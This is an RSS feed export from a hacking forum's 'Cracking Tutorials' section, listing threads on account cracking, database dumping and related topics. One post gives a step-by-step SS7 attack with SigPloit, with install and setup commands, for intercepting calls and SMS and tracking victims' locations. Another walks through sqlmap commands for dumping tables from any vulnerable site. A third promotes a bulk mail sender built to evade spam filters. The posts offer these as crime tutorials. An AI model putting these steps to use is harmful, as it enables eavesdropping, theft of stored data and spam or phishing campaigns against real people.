<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/">
	<channel>
		<title><![CDATA[PwnForums - Cracking Tutorials]]></title>
		<link>https://pwnforums.st/</link>
		<description><![CDATA[PwnForums - https://pwnforums.st]]></description>
		<pubDate>Tue, 07 Apr 2026 05:02:07 +0000</pubDate>
		<generator>MyBB</generator>
		<item>
			<title><![CDATA[HOW TO CRACK THE ACCOUNTS STEP BY STEP GUIDE]]></title>
			<link>https://pwnforums.st/Thread-HOW-TO-CRACK-THE-ACCOUNTS-STEP-BY-STEP-GUIDE</link>
			<pubDate>Mon, 09 Feb 2026 18:40:57 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=711089">CrimsonVoid</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-HOW-TO-CRACK-THE-ACCOUNTS-STEP-BY-STEP-GUIDE</guid>
			<description><![CDATA[<span style="color: #e82a1f;" class="mycode_color">                              YOU MUST REPLY TO VIEW THE THREAD OR IF YOU ARE NEW REGISTER THE ACCOUNT THEN COME</span><br />
<br />
<br />
<span style="color: #b10dc9;" class="mycode_color">LINK:<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://pwnforums.st/member.php?action=register">register</a> or <a href="https://pwnforums.st/member.php?action=login">login</a> to view this content.<br />
	</div>
</div></span>]]></description>
			<content:encoded><![CDATA[<span style="color: #e82a1f;" class="mycode_color">                              YOU MUST REPLY TO VIEW THE THREAD OR IF YOU ARE NEW REGISTER THE ACCOUNT THEN COME</span><br />
<br />
<br />
<span style="color: #b10dc9;" class="mycode_color">LINK:<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://pwnforums.st/member.php?action=register">register</a> or <a href="https://pwnforums.st/member.php?action=login">login</a> to view this content.<br />
	</div>
</div></span>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[How to dump the databases through dorks A-Z Step by Step Guide]]></title>
			<link>https://pwnforums.st/Thread-How-to-dump-the-databases-through-dorks-A-Z-Step-by-Step-Guide</link>
			<pubDate>Sun, 08 Feb 2026 08:50:40 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=711089">CrimsonVoid</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-How-to-dump-the-databases-through-dorks-A-Z-Step-by-Step-Guide</guid>
			<description><![CDATA[<span style="color: #dd4030;" class="mycode_color"><span style="font-family: Roboto, sans-serif;" class="mycode_font">You must reply to this thread to view this content </span></span><br />
<br />
<span style="color: #ffffff;" class="mycode_color">Part1</span>:<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://pwnforums.st/member.php?action=register">register</a> or <a href="https://pwnforums.st/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>
<span style="color: #ffffff;" class="mycode_color">Part1</span>:<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://pwnforums.st/member.php?action=register">register</a> or <a href="https://pwnforums.st/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>]]></description>
			<content:encoded><![CDATA[<span style="color: #dd4030;" class="mycode_color"><span style="font-family: Roboto, sans-serif;" class="mycode_font">You must reply to this thread to view this content </span></span><br />
<br />
<span style="color: #ffffff;" class="mycode_color">Part1</span>:<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://pwnforums.st/member.php?action=register">register</a> or <a href="https://pwnforums.st/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>
<span style="color: #ffffff;" class="mycode_color">Part1</span>:<div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://pwnforums.st/member.php?action=register">register</a> or <a href="https://pwnforums.st/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[[Spanish] hack4u courses]]></title>
			<link>https://pwnforums.st/Thread-Spanish-hack4u-courses</link>
			<pubDate>Wed, 07 Jan 2026 23:16:30 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=698282">alpaceca</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-Spanish-hack4u-courses</guid>
			<description><![CDATA[Does anyone courses of academy hack4u? If you have could you post it or share it pls...]]></description>
			<content:encoded><![CDATA[Does anyone courses of academy hack4u? If you have could you post it or share it pls...]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Exploitation of the SS7 Network | Intercepting Messages & Calls]]></title>
			<link>https://pwnforums.st/Thread-Exploitation-of-the-SS7-Network-Intercepting-Messages-Calls</link>
			<pubDate>Mon, 05 Jan 2026 00:54:18 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=463826">cedawi1031</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-Exploitation-of-the-SS7-Network-Intercepting-Messages-Calls</guid>
			<description><![CDATA[<span style="font-size: x-large;" class="mycode_size">Introduction</span><br />
<br />
<span style="color: #daa520;" class="mycode_color">SS7-based cyberattacks constitute a significant threat to mobile communications, leveraging security flaws inherent in the Signalling System No. 7 (SS7) protocol <span style="font-weight: bold;" class="mycode_b">to intercept and compromise voice calls and text messages across cellular networks.</span><br />
These attacks manipulate the authentication mechanisms of SS7-enabled communication infrastructure, enabling malicious actors to illicitly <span style="font-weight: bold;" class="mycode_b">eavesdrop on SMS and voice communications</span>. By falsifying Point Codes—a unique identifier for network nodes—attackers can masquerade as legitimate components such as Mobile Switching Centres or Visitor Location Registers, thereby redirecting calls and messages covertly. This method facilitates unauthorised access to confidential data <span style="font-weight: bold;" class="mycode_b">without detection.</span></span><br />
<br />
<span style="color: #00ffff;" class="mycode_color"><span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">A. SS7 Exploitation via SigPloit</span></span></span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">Repository:</span> <a href="https://github.com/SigPloiter/SigPloit" target="_blank" rel="noopener" class="mycode_url">https://github.com/SigPloiter/SigPloit</a><br />
<br />
<span style="color: #00ffff;" class="mycode_color">SigPloit is a specialised tool designed to exploit vulnerabilities within SS7 networks through multiple methodologies, including:</span><br />
<br />
<span style="color: #48d1cc;" class="mycode_color">- Mobile Application Part (MAP) Exploitation:</span> <br />
As the primary attack vector within SigPloit, MAP facilitates exploits such as subscriber location tracking and SMS interception. The tool dispatches MAP messages—including UpdateLocation and AnyTimeInterrogation—to interact with Home Location Registers, VLRs, and MSCs, thereby <span style="font-weight: bold;" class="mycode_b">retrieving a victim’s real-time location or diverting messages to an attacker-controlled endpoint.</span><br />
<br />
<span style="color: #48d1cc;" class="mycode_color">- Point Code (PC) Spoofing:</span><br />
Attackers can forge legitimate signalling points (e.g., MSCs or HLRs) by mimicking their Point Codes. This deception allows adversaries to transmit falsified messages under the guise of trusted network elements, <span style="font-weight: bold;" class="mycode_b">manipulating call routing to intercept communications.</span><br />
<br />
<span style="color: #48d1cc;" class="mycode_color">- Man-in-the-Middle (MitM) Attacks:</span><br />
SigPloit replicates MitM attacks by altering call or SMS routing instructions issued by MSCs or Signal Transfer Points. By modifying these routing directives, <span style="font-weight: bold;" class="mycode_b">attackers can position themselves surreptitiously within the communication channel between two parties.</span><br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b"><span style="color: #00ff7f;" class="mycode_color">B. Gaining Access to the SS7 Network via SIGTRAN</span></span></span><br />
<br />
Before initiating an attack on the SS7 protocol, it is first necessary to establish access to the network. <span style="font-weight: bold;" class="mycode_b">This process is strictly controlled due to the significant risks posed by unauthorised interception of calls and messages</span>, among other malicious activities.<br />
<br />
One method of obtaining SS7 network access involves leveraging <span style="font-weight: bold;" class="mycode_b"><span style="color: #ff4500;" class="mycode_color">SIGTRAN (Signalling Transport)</span></span>, which facilitates the conversion of SS7 signalling protocols into an IP-based transmission format (TCP/IP).<br />
<br />
To interface with a traditional SS7 network or operate SIGTRAN protocols within an IP environment, a SIGTRAN gateway is required. Such gateways are typically supplied by telecommunications equipment manufacturers or vendors. Once obtained, the system must be configured to support the various SIGTRAN protocol layers, including:<br />
<br />
<span style="color: #00ff7f;" class="mycode_color"><span style="font-weight: bold;" class="mycode_b">- SCTP (Stream Control Transmission Protocol)- M3UA (MTP3 User Adaptation Layer)- SUA (SCCP User Adaptation Layer)- Other relevant protocol layers.</span></span><br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #ff6347;" class="mycode_color"><span style="font-size: x-large;" class="mycode_size">C. Step-by-Step Exploitation of SS7 Using SigPloit</span></span></span><br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #ff7f50;" class="mycode_color">Prerequisites:</span></span><ul class="mycode_list"><li>A Linux-based OS.<br />
</li>
<li>Python 2.7 or later.<br />
</li>
<li>Java Runtime Environment (JRE) version 1.7 or higher.<br />
</li>
<li>Installation of the SCTP utilities package:<br />
Code: <a href="http://bestteermb42clir6ux7xm76d4jjodh3fpahjqgbddbmfrgp4skg2wqd.onion/viewtopic.php?f=50&amp;t=17409#" target="_blank" rel="noopener" class="mycode_url">Select all</a><br />
sudo apt-get install lksctp-tools<br />
</li>
</ul>
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #ff7f50;" class="mycode_color">1. Installing SigPloit:</span></span><br />
<br />
Execute the following commands sequentially:<br />
Code: <a href="http://bestteermb42clir6ux7xm76d4jjodh3fpahjqgbddbmfrgp4skg2wqd.onion/viewtopic.php?f=50&amp;t=17409#" target="_blank" rel="noopener" class="mycode_url">Select all</a><br />
git clone <a href="https://github.com/SigPloiter/SigPloit.git" target="_blank" rel="noopener" class="mycode_url">https://github.com/SigPloiter/SigPloit.git</a><br />
<br />
Code: <a href="http://bestteermb42clir6ux7xm76d4jjodh3fpahjqgbddbmfrgp4skg2wqd.onion/viewtopic.php?f=50&amp;t=17409#" target="_blank" rel="noopener" class="mycode_url">Select all</a><br />
cd SigPloit<br />
<br />
Code: <a href="http://bestteermb42clir6ux7xm76d4jjodh3fpahjqgbddbmfrgp4skg2wqd.onion/viewtopic.php?f=50&amp;t=17409#" target="_blank" rel="noopener" class="mycode_url">Select all</a><br />
sudo pip2 install -r requirements.txt<br />
<br />
Code: <a href="http://bestteermb42clir6ux7xm76d4jjodh3fpahjqgbddbmfrgp4skg2wqd.onion/viewtopic.php?f=50&amp;t=17409#" target="_blank" rel="noopener" class="mycode_url">Select all</a><br />
python sigploit.py<br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #ff7f50;" class="mycode_color">2. Intercepting Messages and Calls:</span></span><br />
<br />
Prior to executing an attack, <span style="font-weight: bold;" class="mycode_b">access to the SS7 network must first be established</span>. As previously outlined, this can be achieved through <span style="font-weight: bold;" class="mycode_b">SIGTRAN</span> configuration.<br />
<br />
<span style="color: #ff7f50;" class="mycode_color">2.1. Enter: <span style="font-weight: bold;" class="mycode_b">0</span></span><br />
<br />
<br />
<br />
<span style="color: #ff7f50;" class="mycode_color">2.2. Enter: <span style="font-weight: bold;" class="mycode_b">1</span></span><br />
<br />
<br />
<br />
<span style="color: #ff7f50;" class="mycode_color">2.3. Enter: <span style="font-weight: bold;" class="mycode_b">0</span></span><br />
<br />
<br />
<br />
<span style="color: #ff7f50;" class="mycode_color">2.4. Enter: <span style="font-weight: bold;" class="mycode_b">show options</span></span><br />
<br />
To establish the appropriate settings, consult the <span style="font-weight: bold;" class="mycode_b">readme</span> file located at the following directory:<br />
Code: <a href="http://bestteermb42clir6ux7xm76d4jjodh3fpahjqgbddbmfrgp4skg2wqd.onion/viewtopic.php?f=50&amp;t=17409#" target="_blank" rel="noopener" class="mycode_url">Select all</a><br />
SigPloit/Testing/Server/Attacks/Interception/UpdateLocation_Server<br />
<br />
<span style="color: #ff7f50;" class="mycode_color">2.5. Enter: <span style="font-weight: bold;" class="mycode_b">cat Parameters</span></span><br />
<br />
<br />
Now, you must first assign the necessary IP addresses to your local loopback interface.<br />
<br />
Execute the following commands with administrative privileges:<br />
Code: <a href="http://bestteermb42clir6ux7xm76d4jjodh3fpahjqgbddbmfrgp4skg2wqd.onion/viewtopic.php?f=50&amp;t=17409#" target="_blank" rel="noopener" class="mycode_url">Select all</a><br />
sudo ip address add 192.168.56.101/32 dev lo<br />
<br />
Code: <a href="http://bestteermb42clir6ux7xm76d4jjodh3fpahjqgbddbmfrgp4skg2wqd.onion/viewtopic.php?f=50&amp;t=17409#" target="_blank" rel="noopener" class="mycode_url">Select all</a><br />
sudo ip address add 192.168.56.102/32 dev lo<br />
<br />
Following this configuration, input the previously obtained values from the configuration file into the relevant fields of the tool.<br />
null<br />
<br />
To initiate operations, execute the following command:<br />
Code: <a href="http://bestteermb42clir6ux7xm76d4jjodh3fpahjqgbddbmfrgp4skg2wqd.onion/viewtopic.php?f=50&amp;t=17409#" target="_blank" rel="noopener" class="mycode_url">Select all</a><br />
run<br />
<br />
The system is now prepared to monitor and intercept cellular communications. Additionally, you can explore further capabilities such as location tracking, fraud activity, DoS attacks, and so on.]]></description>
			<content:encoded><![CDATA[<span style="font-size: x-large;" class="mycode_size">Introduction</span><br />
<br />
<span style="color: #daa520;" class="mycode_color">SS7-based cyberattacks constitute a significant threat to mobile communications, leveraging security flaws inherent in the Signalling System No. 7 (SS7) protocol <span style="font-weight: bold;" class="mycode_b">to intercept and compromise voice calls and text messages across cellular networks.</span><br />
These attacks manipulate the authentication mechanisms of SS7-enabled communication infrastructure, enabling malicious actors to illicitly <span style="font-weight: bold;" class="mycode_b">eavesdrop on SMS and voice communications</span>. By falsifying Point Codes—a unique identifier for network nodes—attackers can masquerade as legitimate components such as Mobile Switching Centres or Visitor Location Registers, thereby redirecting calls and messages covertly. This method facilitates unauthorised access to confidential data <span style="font-weight: bold;" class="mycode_b">without detection.</span></span><br />
<br />
<span style="color: #00ffff;" class="mycode_color"><span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">A. SS7 Exploitation via SigPloit</span></span></span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">Repository:</span> <a href="https://github.com/SigPloiter/SigPloit" target="_blank" rel="noopener" class="mycode_url">https://github.com/SigPloiter/SigPloit</a><br />
<br />
<span style="color: #00ffff;" class="mycode_color">SigPloit is a specialised tool designed to exploit vulnerabilities within SS7 networks through multiple methodologies, including:</span><br />
<br />
<span style="color: #48d1cc;" class="mycode_color">- Mobile Application Part (MAP) Exploitation:</span> <br />
As the primary attack vector within SigPloit, MAP facilitates exploits such as subscriber location tracking and SMS interception. The tool dispatches MAP messages—including UpdateLocation and AnyTimeInterrogation—to interact with Home Location Registers, VLRs, and MSCs, thereby <span style="font-weight: bold;" class="mycode_b">retrieving a victim’s real-time location or diverting messages to an attacker-controlled endpoint.</span><br />
<br />
<span style="color: #48d1cc;" class="mycode_color">- Point Code (PC) Spoofing:</span><br />
Attackers can forge legitimate signalling points (e.g., MSCs or HLRs) by mimicking their Point Codes. This deception allows adversaries to transmit falsified messages under the guise of trusted network elements, <span style="font-weight: bold;" class="mycode_b">manipulating call routing to intercept communications.</span><br />
<br />
<span style="color: #48d1cc;" class="mycode_color">- Man-in-the-Middle (MitM) Attacks:</span><br />
SigPloit replicates MitM attacks by altering call or SMS routing instructions issued by MSCs or Signal Transfer Points. By modifying these routing directives, <span style="font-weight: bold;" class="mycode_b">attackers can position themselves surreptitiously within the communication channel between two parties.</span><br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b"><span style="color: #00ff7f;" class="mycode_color">B. Gaining Access to the SS7 Network via SIGTRAN</span></span></span><br />
<br />
Before initiating an attack on the SS7 protocol, it is first necessary to establish access to the network. <span style="font-weight: bold;" class="mycode_b">This process is strictly controlled due to the significant risks posed by unauthorised interception of calls and messages</span>, among other malicious activities.<br />
<br />
One method of obtaining SS7 network access involves leveraging <span style="font-weight: bold;" class="mycode_b"><span style="color: #ff4500;" class="mycode_color">SIGTRAN (Signalling Transport)</span></span>, which facilitates the conversion of SS7 signalling protocols into an IP-based transmission format (TCP/IP).<br />
<br />
To interface with a traditional SS7 network or operate SIGTRAN protocols within an IP environment, a SIGTRAN gateway is required. Such gateways are typically supplied by telecommunications equipment manufacturers or vendors. Once obtained, the system must be configured to support the various SIGTRAN protocol layers, including:<br />
<br />
<span style="color: #00ff7f;" class="mycode_color"><span style="font-weight: bold;" class="mycode_b">- SCTP (Stream Control Transmission Protocol)- M3UA (MTP3 User Adaptation Layer)- SUA (SCCP User Adaptation Layer)- Other relevant protocol layers.</span></span><br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #ff6347;" class="mycode_color"><span style="font-size: x-large;" class="mycode_size">C. Step-by-Step Exploitation of SS7 Using SigPloit</span></span></span><br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #ff7f50;" class="mycode_color">Prerequisites:</span></span><ul class="mycode_list"><li>A Linux-based OS.<br />
</li>
<li>Python 2.7 or later.<br />
</li>
<li>Java Runtime Environment (JRE) version 1.7 or higher.<br />
</li>
<li>Installation of the SCTP utilities package:<br />
Code: <a href="http://bestteermb42clir6ux7xm76d4jjodh3fpahjqgbddbmfrgp4skg2wqd.onion/viewtopic.php?f=50&amp;t=17409#" target="_blank" rel="noopener" class="mycode_url">Select all</a><br />
sudo apt-get install lksctp-tools<br />
</li>
</ul>
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #ff7f50;" class="mycode_color">1. Installing SigPloit:</span></span><br />
<br />
Execute the following commands sequentially:<br />
Code: <a href="http://bestteermb42clir6ux7xm76d4jjodh3fpahjqgbddbmfrgp4skg2wqd.onion/viewtopic.php?f=50&amp;t=17409#" target="_blank" rel="noopener" class="mycode_url">Select all</a><br />
git clone <a href="https://github.com/SigPloiter/SigPloit.git" target="_blank" rel="noopener" class="mycode_url">https://github.com/SigPloiter/SigPloit.git</a><br />
<br />
Code: <a href="http://bestteermb42clir6ux7xm76d4jjodh3fpahjqgbddbmfrgp4skg2wqd.onion/viewtopic.php?f=50&amp;t=17409#" target="_blank" rel="noopener" class="mycode_url">Select all</a><br />
cd SigPloit<br />
<br />
Code: <a href="http://bestteermb42clir6ux7xm76d4jjodh3fpahjqgbddbmfrgp4skg2wqd.onion/viewtopic.php?f=50&amp;t=17409#" target="_blank" rel="noopener" class="mycode_url">Select all</a><br />
sudo pip2 install -r requirements.txt<br />
<br />
Code: <a href="http://bestteermb42clir6ux7xm76d4jjodh3fpahjqgbddbmfrgp4skg2wqd.onion/viewtopic.php?f=50&amp;t=17409#" target="_blank" rel="noopener" class="mycode_url">Select all</a><br />
python sigploit.py<br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #ff7f50;" class="mycode_color">2. Intercepting Messages and Calls:</span></span><br />
<br />
Prior to executing an attack, <span style="font-weight: bold;" class="mycode_b">access to the SS7 network must first be established</span>. As previously outlined, this can be achieved through <span style="font-weight: bold;" class="mycode_b">SIGTRAN</span> configuration.<br />
<br />
<span style="color: #ff7f50;" class="mycode_color">2.1. Enter: <span style="font-weight: bold;" class="mycode_b">0</span></span><br />
<br />
<br />
<br />
<span style="color: #ff7f50;" class="mycode_color">2.2. Enter: <span style="font-weight: bold;" class="mycode_b">1</span></span><br />
<br />
<br />
<br />
<span style="color: #ff7f50;" class="mycode_color">2.3. Enter: <span style="font-weight: bold;" class="mycode_b">0</span></span><br />
<br />
<br />
<br />
<span style="color: #ff7f50;" class="mycode_color">2.4. Enter: <span style="font-weight: bold;" class="mycode_b">show options</span></span><br />
<br />
To establish the appropriate settings, consult the <span style="font-weight: bold;" class="mycode_b">readme</span> file located at the following directory:<br />
Code: <a href="http://bestteermb42clir6ux7xm76d4jjodh3fpahjqgbddbmfrgp4skg2wqd.onion/viewtopic.php?f=50&amp;t=17409#" target="_blank" rel="noopener" class="mycode_url">Select all</a><br />
SigPloit/Testing/Server/Attacks/Interception/UpdateLocation_Server<br />
<br />
<span style="color: #ff7f50;" class="mycode_color">2.5. Enter: <span style="font-weight: bold;" class="mycode_b">cat Parameters</span></span><br />
<br />
<br />
Now, you must first assign the necessary IP addresses to your local loopback interface.<br />
<br />
Execute the following commands with administrative privileges:<br />
Code: <a href="http://bestteermb42clir6ux7xm76d4jjodh3fpahjqgbddbmfrgp4skg2wqd.onion/viewtopic.php?f=50&amp;t=17409#" target="_blank" rel="noopener" class="mycode_url">Select all</a><br />
sudo ip address add 192.168.56.101/32 dev lo<br />
<br />
Code: <a href="http://bestteermb42clir6ux7xm76d4jjodh3fpahjqgbddbmfrgp4skg2wqd.onion/viewtopic.php?f=50&amp;t=17409#" target="_blank" rel="noopener" class="mycode_url">Select all</a><br />
sudo ip address add 192.168.56.102/32 dev lo<br />
<br />
Following this configuration, input the previously obtained values from the configuration file into the relevant fields of the tool.<br />
null<br />
<br />
To initiate operations, execute the following command:<br />
Code: <a href="http://bestteermb42clir6ux7xm76d4jjodh3fpahjqgbddbmfrgp4skg2wqd.onion/viewtopic.php?f=50&amp;t=17409#" target="_blank" rel="noopener" class="mycode_url">Select all</a><br />
run<br />
<br />
The system is now prepared to monitor and intercept cellular communications. Additionally, you can explore further capabilities such as location tracking, fraud activity, DoS attacks, and so on.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[HOW TO DUMP DATABASES LIKE A PRO]]></title>
			<link>https://pwnforums.st/Thread-HOW-TO-DUMP-DATABASES-LIKE-A-PRO</link>
			<pubDate>Sun, 04 Jan 2026 11:33:25 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=698407">Fanatik</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-HOW-TO-DUMP-DATABASES-LIKE-A-PRO</guid>
			<description><![CDATA[Overview: I spent time making this thread as a lot of people still use SQLi Dumper to dump their shit. In this thread I will show you guys how to dump like a pro !<br />
Requirements: A windows device (rdp works as well)<br />
<br />
To begin we will need to download the program and the language required to run it. First head over to Download Python and download both versions (not needed but its better to have both). Then visit this site sqlmap: automatic SQL injection and database takeover tool and download it.<br />
<br />
Setup:<br />
After installing python extract sqlmap somewhere. I will be showing you some tips to access it from any folder. Rename the program to something easy to type as the .py file will look like sqlmap3849234832948324.<br />
Gyazo<br />
<br />
Usage:<br />
Alright so when your in the sqlmap folder, click the directory and type cmd. this should automatically open a command prompt in your current folder. Type the following command:<br />
python sqlmap.py -u (url here) --random-agent<br />
press y for everything UNTIL it asks you if you wanna keep searching for vulnerabilities after finding one.<br />
After it finishes write the next command:<br />
python sqlmap.py -u (url) --dbs --random-agent --threads=10<br />
it should print databases. (i will let you know how i personally do it combining both dumper and sqlmap.<br />
python sqlmap.py -u (url) -D (databasename) --tables --random-agent --threads=10<br />
it should list a bunch of tables. depending on what you want to dump...<br />
python sqlmap.py -u (url) -D (db name) -T (table name) --columns -- random-agent --threads=10<br />
<br />
and finally how to dump your target:<br />
python sqlmap.py -u (url) -D (db name) -T (table name) -C (column,name) --dump --random-agent --threads=10<br />
what it should look like at the end:<br />
python sqlmap.py -u <a href="https://yourmomsvagina.com" target="_blank" rel="noopener" class="mycode_url">https://yourmomsvagina.com</a><br />
<br />
AND BOOM YOU JUST DUMPED SOMETHING !<br />
<br />
Now some of you guys might wonder how you can combine dumper and sqlmap for the best results. after scanning urls and checking to see if they are exploitable/injectable, you wanna go to an injectable url (choose any injectable url and click new dumper) and the database name and columns should show up. copy the url without the exploit in it (<a href="http://www.pornhub" target="_blank" rel="noopener" class="mycode_url">www.pornhub</a>.' = <a href="http://www.pornhub" target="_blank" rel="noopener" class="mycode_url">www.pornhub</a>. removing the ')<br />
go to sqlmap and follow the steps i listed earlier.]]></description>
			<content:encoded><![CDATA[Overview: I spent time making this thread as a lot of people still use SQLi Dumper to dump their shit. In this thread I will show you guys how to dump like a pro !<br />
Requirements: A windows device (rdp works as well)<br />
<br />
To begin we will need to download the program and the language required to run it. First head over to Download Python and download both versions (not needed but its better to have both). Then visit this site sqlmap: automatic SQL injection and database takeover tool and download it.<br />
<br />
Setup:<br />
After installing python extract sqlmap somewhere. I will be showing you some tips to access it from any folder. Rename the program to something easy to type as the .py file will look like sqlmap3849234832948324.<br />
Gyazo<br />
<br />
Usage:<br />
Alright so when your in the sqlmap folder, click the directory and type cmd. this should automatically open a command prompt in your current folder. Type the following command:<br />
python sqlmap.py -u (url here) --random-agent<br />
press y for everything UNTIL it asks you if you wanna keep searching for vulnerabilities after finding one.<br />
After it finishes write the next command:<br />
python sqlmap.py -u (url) --dbs --random-agent --threads=10<br />
it should print databases. (i will let you know how i personally do it combining both dumper and sqlmap.<br />
python sqlmap.py -u (url) -D (databasename) --tables --random-agent --threads=10<br />
it should list a bunch of tables. depending on what you want to dump...<br />
python sqlmap.py -u (url) -D (db name) -T (table name) --columns -- random-agent --threads=10<br />
<br />
and finally how to dump your target:<br />
python sqlmap.py -u (url) -D (db name) -T (table name) -C (column,name) --dump --random-agent --threads=10<br />
what it should look like at the end:<br />
python sqlmap.py -u <a href="https://yourmomsvagina.com" target="_blank" rel="noopener" class="mycode_url">https://yourmomsvagina.com</a><br />
<br />
AND BOOM YOU JUST DUMPED SOMETHING !<br />
<br />
Now some of you guys might wonder how you can combine dumper and sqlmap for the best results. after scanning urls and checking to see if they are exploitable/injectable, you wanna go to an injectable url (choose any injectable url and click new dumper) and the database name and columns should show up. copy the url without the exploit in it (<a href="http://www.pornhub" target="_blank" rel="noopener" class="mycode_url">www.pornhub</a>.' = <a href="http://www.pornhub" target="_blank" rel="noopener" class="mycode_url">www.pornhub</a>. removing the ')<br />
go to sqlmap and follow the steps i listed earlier.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[SENDER MAIL  Open Source  DAFT SENDER]]></title>
			<link>https://pwnforums.st/Thread-SENDER-MAIL-Open-Source-DAFT-SENDER</link>
			<pubDate>Sun, 21 Dec 2025 19:57:36 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=476961">lepetitprince</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-SENDER-MAIL-Open-Source-DAFT-SENDER</guid>
			<description><![CDATA[<div style="text-align: center;" class="mycode_align"><span style="color: #9df9ff;" class="mycode_color"><span style="font-size: xx-large;" class="mycode_size"><span style="font-family: Arial Black;" class="mycode_font">DAFT SENDER OPEN SOURCE </span></span></span></div>
<div style="text-align: center;" class="mycode_align"><img src="https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fpomf2.lain.la%2Ff%2Fe7bift8.jpg" loading="lazy"  width="500" height="200" alt="[Image: e7bift8.jpg]" class="mycode_img" /></div>
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="font-size: xx-large;" class="mycode_size"><span style="color: #9a00b2;" class="mycode_color"><span style="font-family: Arial Black;" class="mycode_font"><a href="https://pixeldrain.com/u/j4XDsbF1" target="_blank" rel="noopener" class="mycode_url">DOWNLOAD</a></span></span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="font-size: xx-large;" class="mycode_size"><span style="color: #9a00b2;" class="mycode_color"><a href="https://pixeldrain.com/u/j4XDsbF1" target="_blank" rel="noopener" class="mycode_url">https://pixeldrain.com/u/j4XDsbF1</a></span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="color: #c10300;" class="mycode_color"><span style="font-size: x-large;" class="mycode_size">Key Features</span></span></span></div>
<div style="text-align: center;" class="mycode_align">✅ <span style="font-weight: bold;" class="mycode_b"><span style="color: #ff30dc;" class="mycode_color">Failure notifications</span></span>: Receive real-time alerts on Telegram when your emails fail to reach the inbox.</div>
<div style="text-align: center;" class="mycode_align">✅ <span style="font-weight: bold;" class="mycode_b"><span style="color: #ff30dc;" class="mycode_color">Continuous reporting</span></span>: Track the progress of your email sends directly from the Telegram dashboard, providing a detailed overview of your campaigns.</div>
<div style="text-align: center;" class="mycode_align">✅ <span style="font-weight: bold;" class="mycode_b"><span style="color: #ff30dc;" class="mycode_color">Remote control</span></span>: Manage your email sending with start and stop buttons available directly on the Telegram panel.</div>
<div style="text-align: center;" class="mycode_align">✅ <span style="font-weight: bold;" class="mycode_b"><span style="color: #f012be;" class="mycode_color">Easy configuration</span></span>: Quickly access and manage configuration settings through the Telegram dashboard.</div>
<div style="text-align: center;" class="mycode_align">✅ <span style="font-weight: bold;" class="mycode_b"><span style="color: #f012be;" class="mycode_color">Continuous inbox testing</span></span>: Monitor in real time whether your emails land in the inbox or are filtered into spam.<br />
</div>
<div style="text-align: center;" class="mycode_align">✅<span style="color: #f012be;" class="mycode_color"> <span style="font-weight: bold;" class="mycode_b">Automatic rotation</span></span>: Benefit from automatic rotation of sender names, sending addresses, and subject lines to improve delivery performance.</div>
<hr class="mycode_hr" />
<div style="text-align: center;" class="mycode_align"><span style="color: #c10300;" class="mycode_color"><span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Header Management</span></span></span></div>
